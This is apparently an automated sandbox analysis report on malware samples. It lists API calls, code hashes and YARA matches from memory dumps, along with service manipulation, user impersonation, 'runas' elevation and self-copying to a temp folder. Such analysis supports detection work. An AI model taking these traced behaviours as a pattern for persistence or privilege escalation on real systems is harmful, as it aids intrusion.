                                                                        • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                        • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                        • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                        • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                        				intOrPtr _t25;
                                                                        				void* _t26;
                                                                        				void* _t28;
                                                                        
                                                                        				_t25 = _a16;
                                                                        				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                        					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                        					goto L9;
                                                                        				} else {
                                                                        					_t34 = _t25 - 0x66;
                                                                        					if(_t25 != 0x66) {
                                                                        						__eflags = _t25 - 0x61;
                                                                        						if(_t25 == 0x61) {
                                                                        							L7:
                                                                        							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                        						} else {
                                                                        							__eflags = _t25 - 0x41;
                                                                        							if(__eflags == 0) {
                                                                        								goto L7;
                                                                        							} else {
                                                                        								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                        							}
                                                                        						}
                                                                        						L9:
                                                                        						return _t26;
                                                                        					} else {
                                                                        						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                        					}
                                                                        				}
                                                                        			}







                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                        • String ID:
                                                                        • API String ID: 3016257755-0
                                                                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                        • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                        • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:56.8%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:28.6%
                                                                        Total number of Nodes:21
                                                                        Total number of Limit Nodes:0

                                                                        Callgraph

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.319415276.00007FFDC87B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC87B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7ffdc87b0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeConfigService
                                                                        • String ID:
                                                                        • API String ID: 3849694230-0
                                                                        • Opcode ID: 53c445b60fadff15bda865a4fda2bc2353c71aea65b53c23c3e0c2ef35bcced4
                                                                        • Instruction ID: e28786ec6b61fd0d39f57067b9e9a6955bd2b9ad521d0666d37331141ed8d149
                                                                        • Opcode Fuzzy Hash: 53c445b60fadff15bda865a4fda2bc2353c71aea65b53c23c3e0c2ef35bcced4
                                                                        • Instruction Fuzzy Hash: A5F1C330A18A4D4FEB68DF28CC567F977D1FB58311F10426EE84EC7291EA7499818BC6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.319415276.00007FFDC87B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC87B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7ffdc87b0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: NameUser
                                                                        • String ID:
                                                                        • API String ID: 2645101109-0
                                                                        • Opcode ID: a3d7a0c6a90383fe2894f53bf9b067ecae1d7d365efd291a0e59eea78166683d
                                                                        • Instruction ID: 3fb3e0ea89a1f0be41906c01f634b0b5c0c1bdbed55ae2053e46a9022775e011
                                                                        • Opcode Fuzzy Hash: a3d7a0c6a90383fe2894f53bf9b067ecae1d7d365efd291a0e59eea78166683d
                                                                        • Instruction Fuzzy Hash: C4915F30A08A4D8FEB68DF18C899BF977D1FF55310F00416EE84EC7292DA75A985CB85
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph (node and edge listing omitted); API call in graph: OpenServiceA
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.319415276.00007FFDC87B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC87B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7ffdc87b0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: OpenService
                                                                        • String ID:
                                                                        • API String ID: 3098006287-0
                                                                        • Opcode ID: 0f2f3216d3632c1537140222ade97ed4171d7be3c3edf1571af46cf33aecbf0b
                                                                        • Instruction ID: 0d10060bd32d1a0f1a2ecfc27da841474fff4beaf3ec2bac5054b7a823732be3
                                                                        • Opcode Fuzzy Hash: 0f2f3216d3632c1537140222ade97ed4171d7be3c3edf1571af46cf33aecbf0b
                                                                        • Instruction Fuzzy Hash: E951C670908A8D4FEB58EF28CC5A7F97BD1FB59311F10416EE84EC3292DE74A8418B85
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph (node and edge listing omitted); API call in graph: OpenSCManagerW
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.319415276.00007FFDC87B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC87B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7ffdc87b0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: ManagerOpen
                                                                        • String ID:
                                                                        • API String ID: 1889721586-0
                                                                        • Opcode ID: c8071db29e843ab0697143bc5bc42d8162a12f9f2105ac6ba1cc0f1dedb20fad
                                                                        • Instruction ID: 109e2e10a9423426847a1f2bdc70ad2a84929c40a612fb095283d13b330df422
                                                                        • Opcode Fuzzy Hash: c8071db29e843ab0697143bc5bc42d8162a12f9f2105ac6ba1cc0f1dedb20fad
                                                                        • Instruction Fuzzy Hash: AE31A43190CA584FDB28DF989859AFABBF0EB65311F00426FD04ED3592DF706845CB85
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph (node and edge listing omitted); API call in graph: ControlService
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.319415276.00007FFDC87B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC87B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7ffdc87b0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: ControlService
                                                                        • String ID:
                                                                        • API String ID: 253159669-0
                                                                        • Opcode ID: 1ee4445f8612f8c9c1c53dd09d61a2068b8f60df340346275d44251f90dc3e27
                                                                        • Instruction ID: fc038a620d6dee27823275ce6520b1b7d7f5c9ff2ad2259416c0609173930753
                                                                        • Opcode Fuzzy Hash: 1ee4445f8612f8c9c1c53dd09d61a2068b8f60df340346275d44251f90dc3e27
                                                                        • Instruction Fuzzy Hash: 5C31F53190CB588FDB18DF9D9845AF97BE0EF65321F04017FE08AD3292DB64A805CB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph (node and edge listing omitted); API call in graph: FindCloseChangeNotification
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.319415276.00007FFDC87B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC87B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7ffdc87b0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 1c84739e97658b883ada4f636337fb37b7476901443d1203279c480ed5649086
                                                                        • Instruction ID: 65fbbe634686054972bc58a18c5a18301fcdd369ec920a58b8631202599edc0d
                                                                        • Opcode Fuzzy Hash: 1c84739e97658b883ada4f636337fb37b7476901443d1203279c480ed5649086
                                                                        • Instruction Fuzzy Hash: 7B31D43090C7889FDB0ADB688815BE97FF0EF57320F04429FD089C31A2DA696856CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph (node and edge listing omitted); API call in graph: ImpersonateLoggedOnUser
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.319415276.00007FFDC87B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC87B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7ffdc87b0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: ImpersonateLoggedUser
                                                                        • String ID:
                                                                        • API String ID: 2216092060-0
                                                                        • Opcode ID: 9d6d1cf6b69d0bbec7c3427f5ed731ab9147a4de3b89789de79ecd203ffc5263
                                                                        • Instruction ID: 414020586956865084124877d5e46864503d9a5d2df3e0a53f9e948d70214de1
                                                                        • Opcode Fuzzy Hash: 9d6d1cf6b69d0bbec7c3427f5ed731ab9147a4de3b89789de79ecd203ffc5263
                                                                        • Instruction Fuzzy Hash: 7431D43190CA4C8FDB58DF688845BF9BBE1FF66321F04422ED049C3192DB74A856CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(0121E000,?,0121A9A0,0121AF26,?,0121E000,0121AF26,0121E000), ref: 0121A9C3
                                                                        • TerminateProcess.KERNEL32(00000000,?,0121A9A0,0121AF26,?,0121E000,0121AF26,0121E000), ref: 0121A9CA
                                                                        • ExitProcess.KERNEL32 ref: 0121A9DC
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$CurrentExitTerminate
                                                                        • String ID:
                                                                        • API String ID: 1703294689-0
                                                                        • Opcode ID: 2ca62b583ee3324943808e3d210dd6b8d31f22eab93f7804719cbab4d2006099
                                                                        • Instruction ID: 418282cc9f98a1267bc395d0e5e19090d03fc64125e7ce73d5ef540871d02a90
                                                                        • Opcode Fuzzy Hash: 2ca62b583ee3324943808e3d210dd6b8d31f22eab93f7804719cbab4d2006099
                                                                        • Instruction Fuzzy Hash: 4AE04F35011148BBCF31AF14D80CA9D3BA9EB20251F264425F50587125CB35EDC1EB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00017A80,01217776), ref: 01217A79
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: f619417a5f90f278f77d2d100540a247f291d8e70f06d6ee3f5a38cf60e501e7
                                                                        • Instruction ID: 55bb6c35bc5a5fa5810b68dc5380d438aa31f5d36381cf333078b3ff5d1fdce4
                                                                        • Opcode Fuzzy Hash: f619417a5f90f278f77d2d100540a247f291d8e70f06d6ee3f5a38cf60e501e7
                                                                        • Instruction Fuzzy Hash:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(01239708,00000FA0,?,?,01217028), ref: 01217056
                                                                        • GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,01217028), ref: 01217061
                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,01217028), ref: 01217072
                                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 01217084
                                                                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 01217092
                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,01217028), ref: 012170B5
                                                                        • ___scrt_fastfail.LIBCMT ref: 012170C6
                                                                        • DeleteCriticalSection.KERNEL32(01239708,00000007,?,?,01217028), ref: 012170D1
                                                                        • CloseHandle.KERNEL32(00000000,?,?,01217028), ref: 012170E1
                                                                        Strings
                                                                        • kernel32.dll, xrefs: 0121706D
                                                                        • SleepConditionVariableCS, xrefs: 0121707E
                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0121705C
                                                                        • WakeAllConditionVariable, xrefs: 0121708A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                                                                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                        • API String ID: 3578986977-3242537097
                                                                        • Opcode ID: 54f5ef6d027c75c0edc1d15c0bbe58a6625dea8048943babdb2959d0fc3c5009
                                                                        • Instruction ID: 2cb08f738ff54e642cb56805b09433001b314c2c11b9dcbcd72be97f056f01dd
                                                                        • Opcode Fuzzy Hash: 54f5ef6d027c75c0edc1d15c0bbe58a6625dea8048943babdb2959d0fc3c5009
                                                                        • Instruction Fuzzy Hash: 8001B9B46713117BEF325F797C0D99E3AD8DB95B40B121024FB00D624CEAB488009760
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 01222368: CreateFileW.KERNELBASE(00000000,00000000,?,01222758,?,?,00000000,?,01222758,00000000,0000000C), ref: 01222385
                                                                        • GetLastError.KERNEL32 ref: 012227C3
                                                                        • __dosmaperr.LIBCMT ref: 012227CA
                                                                        • GetFileType.KERNELBASE(00000000), ref: 012227D6
                                                                        • GetLastError.KERNEL32 ref: 012227E0
                                                                        • __dosmaperr.LIBCMT ref: 012227E9
                                                                        • CloseHandle.KERNEL32(00000000), ref: 01222809
                                                                        • CloseHandle.KERNEL32(0121D4F0), ref: 01222956
                                                                        • GetLastError.KERNEL32 ref: 01222988
                                                                        • __dosmaperr.LIBCMT ref: 0122298F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                        • String ID: H
                                                                        • API String ID: 4237864984-2852464175
                                                                        • Opcode ID: 0ff792623eb08b247d4e25ed487d2d39908aad7d77ad1e43358e80a5689f99e7
                                                                        • Instruction ID: ee852758f84aa34dae8c49a14ff159b66db301ae37e3c299081c22bf9a2e98c8
                                                                        • Opcode Fuzzy Hash: 0ff792623eb08b247d4e25ed487d2d39908aad7d77ad1e43358e80a5689f99e7
                                                                        • Instruction Fuzzy Hash: 27A14732A24165EFCF29DF68D855BBD3BF1AB0A320F140159F911AF391CB769842CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph (node and edge listing omitted); API calls in graph: GetTempPathA, GetModuleFileNameA, GetFileAttributesA, CreateDirectoryA, CopyFileA
                                                                        APIs
                                                                        • GetTempPathA.KERNEL32(00000104,?), ref: 01209C90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: PathTemp
                                                                        • String ID:
                                                                        • API String ID: 2920410445-0
                                                                        • Opcode ID: 590676a2a6e8bd8b7fb2b06ea83b4dd5708044aea8cc5ef9800938312201dc1c
                                                                        • Instruction ID: f492b8cd1efc6d3ca2db0cada90fb1529ccae6902ca32179e25d8994c3766c54
                                                                        • Opcode Fuzzy Hash: 590676a2a6e8bd8b7fb2b06ea83b4dd5708044aea8cc5ef9800938312201dc1c
                                                                        • Instruction Fuzzy Hash: 47A190B09102688BDF21DB24CC447DDBBB9AB55314F8046D8D60967282DB755FC8CFA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • Sleep.KERNEL32(000003E8), ref: 012042B9
                                                                        • SetCurrentDirectoryA.KERNEL32(00000000,FDD920DC), ref: 01204364
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CurrentDirectorySleep
                                                                        • String ID: runas
                                                                        • API String ID: 16921501-4000483414
                                                                        • Opcode ID: 073ac07f9132f189e8d4262f923c55a653e73306d01ec7ea6ded729505ba3f46
                                                                        • Instruction ID: 633245dc0b609e5cd836f58ca65e5b0112f0e9d3c6793b1451d6dd646d89e393
                                                                        • Opcode Fuzzy Hash: 073ac07f9132f189e8d4262f923c55a653e73306d01ec7ea6ded729505ba3f46
                                                                        • Instruction Fuzzy Hash: 18E16C71A202849FDB09EB78CC457ADBFB5EFA1314F54835CE501AB3C6DB758A408792
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?), ref: 0120A04D
                                                                        • GetFileAttributesA.KERNELBASE(?,?,?,?,?), ref: 0120A068
                                                                        • CopyFileA.KERNEL32 ref: 0120A1A5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$AttributesCopyCreateDirectory
                                                                        • String ID:
                                                                        • API String ID: 210682061-0
                                                                        • Opcode ID: 37d09420753e7a9d66896993eb66124d92d376eed8909340d3bf9934ab44adbd
                                                                        • Instruction ID: 6bb025133726da9bb76a95e996ff0ec18bf7a8236372db5a83d8fc76a1bf23ef
                                                                        • Opcode Fuzzy Hash: 37d09420753e7a9d66896993eb66124d92d376eed8909340d3bf9934ab44adbd
                                                                        • Instruction Fuzzy Hash: E6410BB1A202188FDB25DB28CC8979CBB75AF65314F8406DCD609A72C3DB355BC48F66
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 01220A5E
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 01220ACC
                                                                          • Part of subcall function 01220971: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,01224B40,?,00000000,00000000), ref: 01220A13
                                                                          • Part of subcall function 0121DB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,01218272,?,?,?,?,?,012020C3,?,?), ref: 0121DB6E
                                                                        • _free.LIBCMT ref: 01220ABD
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                                                        • String ID:
                                                                        • API String ID: 2560199156-0
                                                                        • Opcode ID: e1dfad1857ee5f32cc72efee21fb691a9d6367ce10add0775825c44184783c2d
                                                                        • Instruction ID: 08de661fefb8fe1fa8a5cc4f39a6e3491bf602c39c9e29b0a1a2569662df8dc5
                                                                        • Opcode Fuzzy Hash: e1dfad1857ee5f32cc72efee21fb691a9d6367ce10add0775825c44184783c2d
                                                                        • Instruction Fuzzy Hash: C401ACA36212767F773155BA1C8CC7F6D6DCED2D903450229FB05D2204FD658D0282B8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 01209EB5
                                                                        • CopyFileA.KERNEL32 ref: 0120A1A5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CopyModuleName
                                                                        • String ID:
                                                                        • API String ID: 4108865673-0
                                                                        • Opcode ID: 60d10041f85a72e62e0cf088379b30e26ea4be7a449f939505c47377f6419f71
                                                                        • Instruction ID: e1a2f22e41dbbae26181ac2e39a2ef4dae3c4863f959641af84ac6c48788a1e3
                                                                        • Opcode Fuzzy Hash: 60d10041f85a72e62e0cf088379b30e26ea4be7a449f939505c47377f6419f71
                                                                        • Instruction Fuzzy Hash: BAC16AB1A202558BDF25DB28CC487ADBB75ABA1214F8442DCD24DA72C3DB319FC48F65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: 9d34a03dca84f4d8663d9bdbd88c18d34bc0fd4ada6dae1423be0642be56ae4a
                                                                        • Instruction ID: ef486b85e1d7ffc7cb538dfe0f3b499c73ef79b6af472903e3feba62ad55e1af
                                                                        • Opcode Fuzzy Hash: 9d34a03dca84f4d8663d9bdbd88c18d34bc0fd4ada6dae1423be0642be56ae4a
                                                                        • Instruction Fuzzy Hash: FB41C276A10215AFCB20DF68C880A6EB7F5EFE9714B1645A9DA15EB345D730ED02CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • _free.LIBCMT ref: 01224DB0
                                                                          • Part of subcall function 0121DB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,01218272,?,?,?,?,?,012020C3,?,?), ref: 0121DB6E
                                                                        • RtlReAllocateHeap.NTDLL(00000000,?,?,00000004,00000000,?,01220E8A,?,00000004,00000002,?,?,?,0121C625,?,00000002), ref: 01224DEC
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmp
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
